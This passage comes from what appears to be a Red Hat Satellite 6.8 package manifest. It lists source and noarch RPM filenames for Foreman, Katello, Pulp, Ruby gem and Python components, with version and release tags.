m\npython-twisted-16.4.1-12.el7sat.src.rpm\npython-typing-extensions-3.7.4.1-2.el7ar.src.rpm\npython-vine-1.1.3-6.el7sat.src.rpm\npython-werkzeug-0.12.2-5.el7sat.src.rpm\npython-yarl-1.4.2-2.el7ar.src.rpm\npython-zope-interface-4.0.5-4.el7.src.rpm\nqpid-cpp-1.36.0-28.el7amq.src.rpm\nqpid-dispatch-1.5.0-4.el7.src.rpm\nqpid-proton-0.28.0-3.el7.src.rpm\nreceptor-0.6.3-1.el7ar.src.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.src.rpm\nrepoview-0.6.6-11.el7sat.src.rpm\nrh-postgresql12-postgresql-evr-0.0.2-1.el7sat.src.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.src.rpm\nrubygem-facter-2.4.1-2.el7sat.src.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.src.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.src.rpm\nrubygem-highline-1.7.8-3.el7sat.src.rpm\nrubygem-newt-0.9.6-3.el7sat.src.rpm\nrubygem-oauth-0.5.4-2.el7sat.src.rpm\nrubygem-passenger-4.0.18-24.el7sat.src.rpm\nrubygem-rack-1.6.12-1.el7sat.src.rpm\nrubygem-rake-0.9.2.2-41.el7sat.src.rpm\nsaslwrapper-0.22-5.el7sat.src.rpm\nsatellite-6.8.0-1.el7sat.src.rpm\nsatellite-installer-6.8.0.11-1.el7sat.src.rpm\ntfm-6.1-1.el7sat.src.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.src.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.src.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-addressable-2.6.0-1.el7sat.src.rpm\ntfm-rubygem-algebrick-0.7.3-6.el7sat.src.rpm\ntfm-rubygem-amazing_print-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ancestry-3.0.7-1.el7sat.src.rpm\ntfm-rubygem-anemone-0.7.2-22.el7sat.src.rpm\ntfm-rubygem-angular-rails-templates-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-ansi-1.5.0-2.el7sat.src.rpm\ntfm-rubygem-apipie-bindings-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-apipie-dsl-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-apipie-params-0.0.5-5.el7sat.src.rpm\ntfm-rubygem-apipie-rails-0.5.17-3.el7sat.src.rpm\ntfm-rubygem-audited-4.9.0-3.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_compute-0.18.7-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_network-0.19.0-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_resources-0.17.6-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_storage-0.17.10-1.el7sat.src.rpm\ntfm-rubygem-azure_mgmt_subscriptions-0.18.2-1.el7sat.src.rpm\ntfm-rubygem-bcrypt-3.1.12-1.el7sat.src.rpm\ntfm-rubygem-builder-3.2.4-1.el7sat.src.rpm\ntfm-rubygem-bundler_ext-0.4.1-4.el7sat.src.rpm\ntfm-rubygem-clamp-1.1.2-5.el7sat.src.rpm\ntfm-rubygem-coffee-rails-5.0.0-1.el7sat.src.rpm\ntfm-rubygem-coffee-script-2.4.1-4.el7sat.src.rpm\ntfm-rubygem-coffee-script-source-1.12.2-4.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-1.1.6-2.el7sat.src.rpm\ntfm-rubygem-concurrent-ruby-edge-0.6.0-2.el7sat.src.rpm\ntfm-rubygem-connection_pool-2.2.2-2.el7sat.src.rpm\ntfm-rubygem-crass-1.0.6-1.el7sat.src.rpm\ntfm-rubygem-css_parser-1.4.7-3.el7sat.src.rpm\ntfm-rubygem-daemons-1.2.3-7.el7sat.src.rpm\ntfm-rubygem-deacon-1.0.0-4.el7sat.src.rpm\ntfm-rubygem-declarative-0.0.10-1.el7sat.src.rpm\ntfm-rubygem-declarative-option-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-deep_cloneable-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-deface-1.5.3-2.el7sat.src.rpm\ntfm-rubygem-diffy-3.0.1-6.el7sat.src.rpm\ntfm-rubygem-domain_name-0.5.20160310-4.el7sat.src.rpm\ntfm-rubygem-dynflow-1.4.7-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-erubi-1.9.0-1.el7sat.src.rpm\ntfm-rubygem-excon-0.58.0-3.el7sat.src.rpm\ntfm-rubygem-execjs-2.7.0-4.el7sat.src.rpm\ntfm-rubygem-facter-2.4.0-6.el7sat.src.rpm\ntfm-rubygem-faraday-0.15.4-1.el7sat.src.rpm\ntfm-rubygem-faraday-cookie_jar-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-faraday_middleware-0.13.1-2.el7sat.src.rpm\ntfm-rubygem-fast_gettext-1.4.1-3.el7sat.src.rpm\ntfm-rubygem-ffi-1.12.2-1.el7sat.src.rpm\ntfm-rubygem-fog-aws-3.6.5-1.el7sat.src.rpm\ntfm-rubygem-fog-core-2.1.0-3.el7sat.src.rpm\ntfm-rubygem-fog-google-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-fog-json-1.2.0-3.el7sat.src.rpm\ntfm-rubygem-fog-kubevirt-1.3.3-1.el7sat.src.rpm\ntfm-rubygem-fog-libvirt-0.7.0-1.el7sat.src.rpm\ntfm-rubygem-fog-openstack-1.0.8-2.el7sat.src.rpm\ntfm-rubygem-fog-ovirt-1.2.5-1.el7sat.src.rpm\ntfm-rubygem-fog-vsphere-3.3.1-1.el7sat.src.rpm\ntfm-rubygem-fog-xml-0.1.2-8.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-2.0.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman-tasks-core-0.3.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible-5.1.3-1.el7sat.src.rpm\ntfm-rubygem-foreman_ansible_core-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-foreman_azure_rm-2.1.2-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_bootdisk-17.0.2-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_discovery-16.1.2-1.el7sat.src.rpm\ntfm-rubygem-foreman_hooks-0.3.16-2.el7sat.src.rpm\ntfm-rubygem-foreman_kubevirt-0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_leapp-0.1.6-1.el7sat.src.rpm\ntfm-rubygem-foreman_openscap-4.0.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution-3.3.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_remote_execution_core-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-foreman_rh_cloud-2.0.12-1.el7sat.src.rpm\ntfm-rubygem-foreman_templates-9.0.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-foreman_theme_satellite-6.0.1.7-1.el7sat.src.rpm\ntfm-rubygem-foreman_virt_who_configure-0.5.2-1.el7sat.src.rpm\ntfm-rubygem-formatador-0.2.1-11.el7sat.src.rpm\ntfm-rubygem-friendly_id-5.3.0-1.el7sat.src.rpm\ntfm-rubygem-fx-0.5.0-1.el7sat.src.rpm\ntfm-rubygem-get_process_mem-0.2.1-3.el7sat.src.rpm\ntfm-rubygem-gettext-3.1.4-10.el7sat.src.rpm\ntfm-rubygem-gettext_i18n_rails-1.8.0-1.el7sat.src.rpm\ntfm-rubygem-git-1.5.0-1.el7sat.src.rpm\ntfm-rubygem-gitlab-sidekiq-fetcher-0.5.2-2.el7sat.src.rpm\ntfm-rubygem-globalid-0.4.2-1.el7sat.src.rpm\ntfm-rubygem-google-api-client-0.23.9-3.el7sat.src.rpm\ntfm-rubygem-googleauth-0.6.7-3.el7sat.src.rpm\ntfm-rubygem-graphql-1.8.14-1.el7sat.src.rpm\ntfm-rubygem-graphql-batch-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-gssapi-1.2.0-6.el7sat.src.rpm\ntfm-rubygem-hammer_cli-2.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman-2.1.2.1-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_admin-0.0.9-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_ansible-0.3.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_azure_rm-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_bootdisk-0.3.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_discovery-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_docker-0.0.6.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_kubevirt-0.1.4-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_leapp-0.1.0-2.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_openscap-0.1.11-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_remote_execution-0.1.2-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_tasks-0.0.14-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_templates-0.2.0-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_foreman_virt_who_configure-0.0.6-1.el7sat.src.rpm\ntfm-rubygem-hammer_cli_katello-0.22.2.2-1.el7sat.src.rpm\ntfm-rubygem-hashie-3.6.0-1.el7sat.src.rpm\ntfm-rubygem-highline-1.7.8-4.el7sat.src.rpm\ntfm-rubygem-http-3.3.0-1.el7sat.src.rpm\ntfm-rubygem-http-cookie-1.0.2-5.el7sat.src.rpm\ntfm-rubygem-http-form_data-2.1.1-1.el7sat.src.rpm\ntfm-rubygem-http_parser.rb-0.6.0-1.el7sat.src.rpm\ntfm-rubygem-httpclient-2.8.3-1.el7sat.src.rpm\ntfm-rubygem-i18n-1.8.2-1.el7sat.src.rpm\ntfm-rubygem-infoblox-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-ipaddress-0.8.0-11.el7sat.src.rpm\ntfm-rubygem-jgrep-1.3.3-12.el7sat.src.rpm\ntfm-rubygem-journald-logger-2.0.4-2.el7sat.src.rpm\ntfm-rubygem-journald-native-1.0.11-2.el7sat.src.rpm\ntfm-rubygem-jwt-2.2.1-1.el7sat.src.rpm\ntfm-rubygem-kafo-4.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_parsers-1.1.0-3.el7sat.src.rpm\ntfm-rubygem-kafo_wizards-0.0.1-4.el7sat.src.rpm\ntfm-rubygem-katello-3.16.0.11-1.el7sat.src.rpm\ntfm-rubygem-kubeclient-4.3.0-1.el7sat.src.rpm\ntfm-rubygem-ldap_fluff-0.4.7-5.el7sat.src.rpm\ntfm-rubygem-little-plugger-1.1.4-1.el7sat.src.rpm\ntfm-rubygem-locale-2.0.9-13.el7sat.src.rpm\ntfm-rubygem-logging-2.2.2-6.el7sat.src.rpm\ntfm-rubygem-logging-journald-2.0.0-2.el7sat.src.rpm\ntfm-rubygem-loofah-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-mail-2.7.1-1.el7sat.src.rpm\ntfm-rubygem-marcel-0.3.3-1.el7sat.src.rpm\ntfm-rubygem-memoist-0.16.0-1.el7sat.src.rpm\ntfm-rubygem-method_source-0.9.2-2.el7sat.src.rpm\ntfm-rubygem-mime-types-3.2.2-4.el7sat.src.rpm\ntfm-rubygem-mime-types-data-3.2018.0812-4.el7sat.src.rpm\ntfm-rubygem-mimemagic-0.3.5-1.el7sat.src.rpm\ntfm-rubygem-mini_mime-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-mini_portile2-2.4.0-1.el7sat.src.rpm\ntfm-rubygem-ms_rest-0.7.4-2.el7sat.src.rpm\ntfm-rubygem-ms_rest_azure-0.11.1-2.el7sat.src.rpm\ntfm-rubygem-multi_json-1.14.1-1.el7sat.src.rpm\ntfm-rubygem-multipart-post-2.0.0-1.el7sat.src.rpm\ntfm-rubygem-mustermann-1.0.2-4.el7sat.src.rpm\ntfm-rubygem-net-ldap-0.16.1-1.el7sat.src.rpm\ntfm-rubygem-net-ping-2.0.1-3.el7sat.src.rpm\ntfm-rubygem-net-scp-1.2.1-3.el7sat.src.rpm\ntfm-rubygem-net-ssh-4.2.0-1.el7sat.src.rpm\ntfm-rubygem-net-ssh-krb-0.4.0-3.el7sat.src.rpm\ntfm-rubygem-netrc-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-nio4r-2.5.2-2.el7sat.src.rpm\ntfm-rubygem-nokogiri-1.10.9-1.el7sat.src.rpm\ntfm-rubygem-oauth-0.5.4-3.el7sat.src.rpm\ntfm-rubygem-openscap-0.4.9-3.el7sat.src.rpm\ntfm-rubygem-optimist-3.0.0-1.el7sat.src.rpm\ntfm-rubygem-os-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-ovirt-engine-sdk-4.2.3-3.el7sat.src.rpm\ntfm-rubygem-ovirt_provision_plugin-2.0.3-1.el7sat.src.rpm\ntfm-rubygem-parse-cron-0.1.4-4.el7sat.src.rpm\ntfm-rubygem-passenger-4.0.18-26.el7sat.src.rpm\ntfm-rubygem-pg-1.1.4-2.el7sat.src.rpm\ntfm-rubygem-polyglot-0.3.5-3.el7sat.src.rpm\ntfm-rubygem-powerbar-2.0.1-2.el7sat.src.rpm\ntfm-rubygem-prometheus-client-1.0.0-1.el7sat.src.rpm\ntfm-rubygem-promise.rb-0.7.4-1.el7sat.src.rpm\ntfm-rubygem-public_suffix-3.0.3-1.el7sat.src.rpm\ntfm-rubygem-pulp_2to3_migration_client-0.2.0-0.1.b6.el7sat.src.rpm\ntfm-rubygem-pulp_ansible_client-0.2.0b13.dev01588546902-1.el7sat.src.rpm\ntfm-rubygem-pulp_certguard_client-0.1.0rc5-1.el7sat.src.rpm\ntfm-rubygem-pulp_container_client-1.4.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_file_client-1.0.1-1.el7sat.src.rpm\ntfm-rubygem-pulp_rpm_client-3.5.0-1.el7sat.src.rpm\ntfm-rubygem-pulpcore_client-3.4.1-1.el7sat.src.rpm\ntfm-rubygem-puma-4.3.3-4.el7sat.src.rpm\ntfm-rubygem-puma-plugin-systemd-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-quantile-0.2.0-3.el7sat.src.rpm\ntfm-rubygem-rabl-0.14.3-1.el7sat.src.rpm\ntfm-rubygem-rack-2.2.3-1.el7sat.src.rpm\ntfm-rubygem-rack-cors-1.0.2-1.el7sat.src.rpm\ntfm-rubygem-rack-jsonp-1.3.1-9.el7sat.src.rpm\ntfm-rubygem-rack-protection-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-rack-test-1.1.0-4.el7sat.src.rpm\ntfm-rubygem-rails-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rails-dom-testing-2.0.3-6.el7sat.src.rpm\ntfm-rubygem-rails-html-sanitizer-1.3.0-1.el7sat.src.rpm\ntfm-rubygem-rails-i18n-6.0.0-2.el7sat.src.rpm\ntfm-rubygem-railties-6.0.3.1-1.el7sat.src.rpm\ntfm-rubygem-rainbow-2.2.1-5.el7sat.src.rpm\ntfm-rubygem-rb-inotify-0.9.7-5.el7sat.src.rpm\ntfm-rubygem-rbovirt-0.1.7-4.el7sat.src.rpm\ntfm-rubygem-rbvmomi-2.2.0-3.el7sat.src.rpm\ntfm-rubygem-record_tag_helper-1.0.1-3.el7sat.src.rpm\ntfm-rubygem-recursive-open-struct-1.1.0-1.el7sat.src.rpm\ntfm-rubygem-redhat_access-2.2.18-1.el7sat.src.rpm\ntfm-rubygem-redhat_access_lib-1.1.5-1.el7sat.src.rpm\ntfm-rubygem-redis-4.1.2-2.el7sat.src.rpm\ntfm-rubygem-representable-3.0.4-1.el7sat.src.rpm\ntfm-rubygem-responders-3.0.0-3.el7sat.src.rpm\ntfm-rubygem-rest-client-2.0.2-3.el7sat.src.rpm\ntfm-rubygem-retriable-3.1.2-1.el7sat.src.rpm\ntfm-rubygem-rkerberos-0.1.5-18.el7sat.src.rpm\ntfm-rubygem-roadie-3.4.0-3.el7sat.src.rpm\ntfm-rubygem-roadie-rails-2.1.1-2.el7sat.src.rpm\ntfm-rubygem-robotex-1.0.0-21.el7sat.src.rpm\ntfm-rubygem-rsec-0.4.3-4.el7sat.src.rpm\ntfm-rubygem-ruby-libvirt-0.7.0-4.el7sat.src.rpm\ntfm-rubygem-ruby2ruby-2.4.2-3.el7sat.src.rpm\ntfm-rubygem-ruby_parser-3.10.1-2.el7sat.src.rpm\ntfm-rubygem-rubyipmi-0.10.0-6.el7sat.src.rpm\ntfm-rubygem-runcible-2.13.0-2.el7sat.src.rpm\ntfm-rubygem-safemode-1.3.5-2.el7sat.src.rpm\ntfm-rubygem-scoped_search-4.1.9-1.el7sat.src.rpm\ntfm-rubygem-secure_headers-6.3.0-2.el7sat.src.rpm\ntfm-rubygem-sequel-5.7.1-2.el7sat.src.rpm\ntfm-rubygem-sexp_processor-4.10.0-5.el7sat.src.rpm\ntfm-rubygem-sidekiq-5.2.7-3.el7sat.src.rpm\ntfm-rubygem-signet-0.11.0-3.el7sat.src.rpm\ntfm-rubygem-sinatra-2.0.3-4.el7sat.src.rpm\ntfm-rubygem-smart_proxy_ansible-3.0.1-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_infoblox-0.0.16-3.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dhcp_remote_isc-0.0.5-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_discovery_image-1.2.1-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dns_infoblox-1.0.0-7.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow-0.2.4-5.el7sat.src.rpm\ntfm-rubygem-smart_proxy_dynflow_core-0.2.6-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_openscap-0.7.3-1.fm2_1.el7sat.src.rpm\ntfm-rubygem-smart_proxy_pulp-2.1.0-2.el7sat.src.rpm\ntfm-rubygem-smart_proxy_remote_execution_ssh-0.3.0-3.el7sat.src.rpm\ntfm-rubygem-sprockets-3.7.2-6.el7sat.src.rpm\ntfm-rubygem-sprockets-rails-3.2.1-6.el7sat.src.rpm\ntfm-rubygem-sqlite3-1.3.13-5.el7sat.src.rpm\ntfm-rubygem-sshkey-1.9.0-3.el7sat.src.rpm\ntfm-rubygem-statsd-instrument-2.1.4-2.el7sat.src.rpm\ntfm-rubygem-stomp-1.4.9-1.el7sat.src.rpm\ntfm-rubygem-text-1.3.0-7.el7sat.src.rpm\ntfm-rubygem-thor-1.0.1-2.el7sat.src.rpm\ntfm-rubygem-thread_safe-0.3.6-5.el7sat.src.rpm\ntfm-rubygem-tilt-2.0.8-4.el7sat.src.rpm\ntfm-rubygem-timeliness-0.3.10-1.el7sat.src.rpm\ntfm-rubygem-tzinfo-1.2.6-1.el7sat.src.rpm\ntfm-rubygem-uber-0.1.0-1.el7sat.src.rpm\ntfm-rubygem-unf-0.1.3-7.el7sat.src.rpm\ntfm-rubygem-unf_ext-0.0.7.2-1.el7sat.src.rpm\ntfm-rubygem-unicode-0.4.4.4-1.el7sat.src.rpm\ntfm-rubygem-unicode-display_width-1.0.5-5.el7sat.src.rpm\ntfm-rubygem-validates_lengths_from_database-0.5.0-7.el7sat.src.rpm\ntfm-rubygem-webpack-rails-0.9.8-6.el7sat.src.rpm\ntfm-rubygem-websocket-driver-0.7.1-1.el7sat.src.rpm\ntfm-rubygem-websocket-extensions-0.1.5-1.el7sat.src.rpm\ntfm-rubygem-will_paginate-3.1.7-3.el7sat.src.rpm\ntfm-rubygem-x-editable-rails-1.5.5-5.el7sat.src.rpm\ntfm-rubygem-xmlrpc-0.3.0-2.el7sat.src.rpm\ntfm-rubygem-zeitwerk-2.2.2-1.el7sat.src.rpm\n\nnoarch:\nansible-collection-redhat-satellite-1.3.0-1.el7sat.noarch.rpm\nansible-runner-1.4.6-1.el7ar.noarch.rpm\nansiblerole-foreman_scap_client-0.0.5-1.el7sat.noarch.rpm\nansiblerole-insights-client-1.7.1-1.el7sat.noarch.rpm\nansiblerole-satellite-receptor-installer-0.6.13-1.el7sat.noarch.rpm\ncandlepin-3.1.21-1.el7sat.noarch.rpm\ncandlepin-selinux-3.1.21-1.el7sat.noarch.rpm\ncrane-selinux-3.4.0-1.el7sat.noarch.rpm\nforeman-2.1.2.19-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-202005201200-1.el7sat.noarch.rpm\nforeman-bootloaders-redhat-tftpboot-202005201200-1.el7sat.noarch.rpm\nforeman-cli-2.1.2.19-1.el7sat.noarch.rpm\nforeman-debug-2.1.2.19-1.el7sat.noarch.rpm\nforeman-discovery-image-3.6.7-1.el7sat.noarch.rpm\nforeman-dynflow-sidekiq-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ec2-2.1.2.19-1.el7sat.noarch.rpm\nforeman-gce-2.1.2.19-1.el7sat.noarch.rpm\nforeman-installer-2.1.2.8-1.el7sat.noarch.rpm\nforeman-installer-katello-2.1.2.8-1.el7sat.noarch.rpm\nforeman-journald-2.1.2.19-1.el7sat.noarch.rpm\nforeman-libvirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-openstack-2.1.2.19-1.el7sat.noarch.rpm\nforeman-ovirt-2.1.2.19-1.el7sat.noarch.rpm\nforeman-postgresql-2.1.2.19-1.el7sat.noarch.rpm\nforeman-proxy-2.1.2-2.el7sat.noarch.rpm\nforeman-proxy-content-3.16.0-1.el7sat.noarch.rpm\nforeman-proxy-journald-2.1.2-2.el7sat.noarch.rpm\nforeman-selinux-2.1.2.3-1.el7sat.noarch.rpm\nforeman-service-2.1.2.19-1.el7sat.noarch.rpm\nforeman-telemetry-2.1.2.19-1.el7sat.noarch.rpm\nforeman-vmware-2.1.2.19-1.el7sat.noarch.rpm\nkatello-3.16.0-1.el7sat.noarch.rpm\nkatello-certs-tools-2.7.1-1.el7sat.noarch.rpm\nkatello-client-bootstrap-1.7.5-1.el7sat.noarch.rpm\nkatello-common-3.16.0-1.el7sat.noarch.rpm\nkatello-debug-3.16.0-1.el7sat.noarch.rpm\nkatello-selinux-3.4.0-1.el7sat.noarch.rpm\nkeycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\nkobo-0.5.1-1.el7sat.noarch.rpm\npulp-admin-client-2.21.3-1.el7sat.noarch.rpm\npulp-docker-admin-extensions-3.2.7-1.el7sat.noarch.rpm\npulp-docker-plugins-3.2.7-1.el7sat.noarch.rpm\npulp-katello-1.0.3-1.el7sat.noarch.rpm\npulp-maintenance-2.21.3-1.el7sat.noarch.rpm\npulp-ostree-admin-extensions-1.3.1-2.el7sat.noarch.rpm\npulp-ostree-plugins-1.3.1-2.el7sat.noarch.rpm\npulp-puppet-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-puppet-tools-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-admin-extensions-2.21.3-2.el7sat.noarch.rpm\npulp-rpm-plugins-2.21.3-2.el7sat.noarch.rpm\npulp-selinux-2.21.3-1.el7sat.noarch.rpm\npulp-server-2.21.3-1.el7sat.noarch.rpm\npuppet-agent-oauth-0.5.1-3.el7sat.noarch.rpm\npuppet-foreman_scap_client-0.4.0-1.el7sat.noarch.rpm\npuppetlabs-stdlib-4.25.1-2.el7sat.noarch.rpm\npuppetserver-6.13.0-1.el7sat.noarch.rpm\npython-blinker-1.3-2.el7sat.noarch.rpm\npython-gnupg-0.3.7-1.el7ui.noarch.rpm\npython-gofer-2.12.5-7.el7sat.noarch.rpm\npython-gofer-qpid-2.12.5-7.el7sat.noarch.rpm\npython-kid-0.9.6-11.el7sat.noarch.rpm\npython-mongoengine-0.10.5-2.el7sat.noarch.rpm\npython-nectar-1.6.2-1.el7sat.noarch.rpm\npython-oauth2-1.5.211-8.el7sat.noarch.rpm\npython-pulp-bindings-2.21.3-1.el7sat.noarch.rpm\npython-pulp-client-lib-2.21.3-1.el7sat.noarch.rpm\npython-pulp-common-2.21.3-1.el7sat.noarch.rpm\npython-pulp-docker-common-3.2.7-1.el7sat.noarch.rpm\npython-pulp-integrity-2.21.3-2.el7sat.noarch.rpm\npython-pulp-oid_validation-2.21.3-1.el7sat.noarch.rpm\npython-pulp-ostree-common-1.3.1-2.el7sat.noarch.rpm\npython-pulp-puppet-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-repoauth-2.21.3-1.el7sat.noarch.rpm\npython-pulp-rpm-common-2.21.3-2.el7sat.noarch.rpm\npython-pulp-streamer-2.21.3-1.el7sat.noarch.rpm\npython-qpid-1.35.0-5.el7.noarch.rpm\npython-semantic_version-2.2.0-6.el7sat.noarch.rpm\npython2-amqp-2.2.2-5.el7sat.noarch.rpm\npython2-ansible-runner-1.4.6-1.el7ar.noarch.rpm\npython2-anyjson-0.3.3-11.el7sat.noarch.rpm\npython2-apypie-0.2.2-1.el7sat.noarch.rpm\npython2-celery-4.0.2-9.el7sat.noarch.rpm\npython2-click-6.7-9.el7sat.noarch.rpm\npython2-crane-3.3.1-9.el7sat.noarch.rpm\npython2-daemon-2.1.2-7.el7at.noarch.rpm\npython2-django-1.11.29-1.el7sat.noarch.rpm\npython2-flask-0.12.2-4.el7sat.noarch.rpm\npython2-future-0.16.0-11.el7sat.noarch.rpm\npython2-isodate-0.5.4-12.el7sat.noarch.rpm\npython2-itsdangerous-0.24-15.el7sat.noarch.rpm\npython2-jinja2-2.10-10.el7sat.noarch.rpm\npython2-jmespath-0.9.0-6.el7_7.noarch.rpm\npython2-keycloak-httpd-client-install-1.2.2-1.el7sat.noarch.rpm\npython2-kombu-4.0.2-13.el7sat.noarch.rpm\npython2-lockfile-0.11.0-10.el7ar.noarch.rpm\npython2-okaara-1.0.37-2.el7sat.noarch.rpm\npython2-pexpect-4.6-1.el7at.noarch.rpm\npython2-ptyprocess-0.5.2-3.el7at.noarch.rpm\npython2-vine-1.1.3-6.el7sat.noarch.rpm\npython2-werkzeug-0.12.2-5.el7sat.noarch.rpm\npython3-async-timeout-3.0.1-2.el7ar.noarch.rpm\npython3-attrs-19.3.0-3.el7ar.noarch.rpm\npython3-chardet-3.0.4-10.el7ar.noarch.rpm\npython3-dateutil-2.8.1-2.el7ar.noarch.rpm\npython3-idna-2.4-2.el7ar.noarch.rpm\npython3-idna-ssl-1.1.0-2.el7ar.noarch.rpm\npython3-prometheus-client-0.7.1-2.el7ar.noarch.rpm\npython3-receptor-satellite-1.2.0-1.el7sat.noarch.rpm\npython3-six-1.11.0-8.el7ar.noarch.rpm\npython3-typing-extensions-3.7.4.1-2.el7ar.noarch.rpm\nqpid-dispatch-tools-1.5.0-4.el7.noarch.rpm\nqpid-tools-1.36.0-28.el7amq.noarch.rpm\nreceptor-0.6.3-1.el7ar.noarch.rpm\nredhat-access-insights-puppet-1.0.1-1.el7sat.noarch.rpm\nrepoview-0.6.6-11.el7sat.noarch.rpm\nrhel8-kickstart-setup-0.0.2-1.el7sat.noarch.rpm\nrubygem-fast_gettext-1.1.0-4.el7sat.noarch.rpm\nrubygem-foreman_scap_client-0.4.6-1.el7sat.noarch.rpm\nrubygem-highline-1.7.8-3.el7sat.noarch.rpm\nrubygem-oauth-0.5.4-2.el7sat.noarch.rpm\nrubygem-rack-1.6.12-1.el7sat.noarch.rpm\nrubygem-rake-0.9.2.2-41.el7sat.noarch.rpm\nsatellite-6.8.0-1.el7sat.noarch.rpm\nsatellite-capsule-6.8.0-1.el7sat.noarch.rpm\nsatellite-cli-6.8.0-1.el7sat.noarch.rpm\nsatellite-common-6.8.0-1.el7sat.noarch.rpm\nsatellite-debug-tools-6.8.0-1.el7sat.noarch.rpm\nsatellite-installer-6.8.0.11-1.el7sat.noarch.rpm\ntfm-rubygem-actioncable-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailbox-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionmailer-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionpack-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actiontext-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-actionview-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activejob-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activemodel-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activerecord-import-1.0.0-6.el7sat.noarch.rpm\ntfm-rubygem-activerecord-session_store-1.1.1-4.el7sat.noarch.rpm\ntfm-rubygem-activestorage-6.0.3.1-1.el7sat.noarch.rpm\ntfm-rubygem-activesupport-6.0.3.1-1.el7sat.noarch.rpm\ntfm-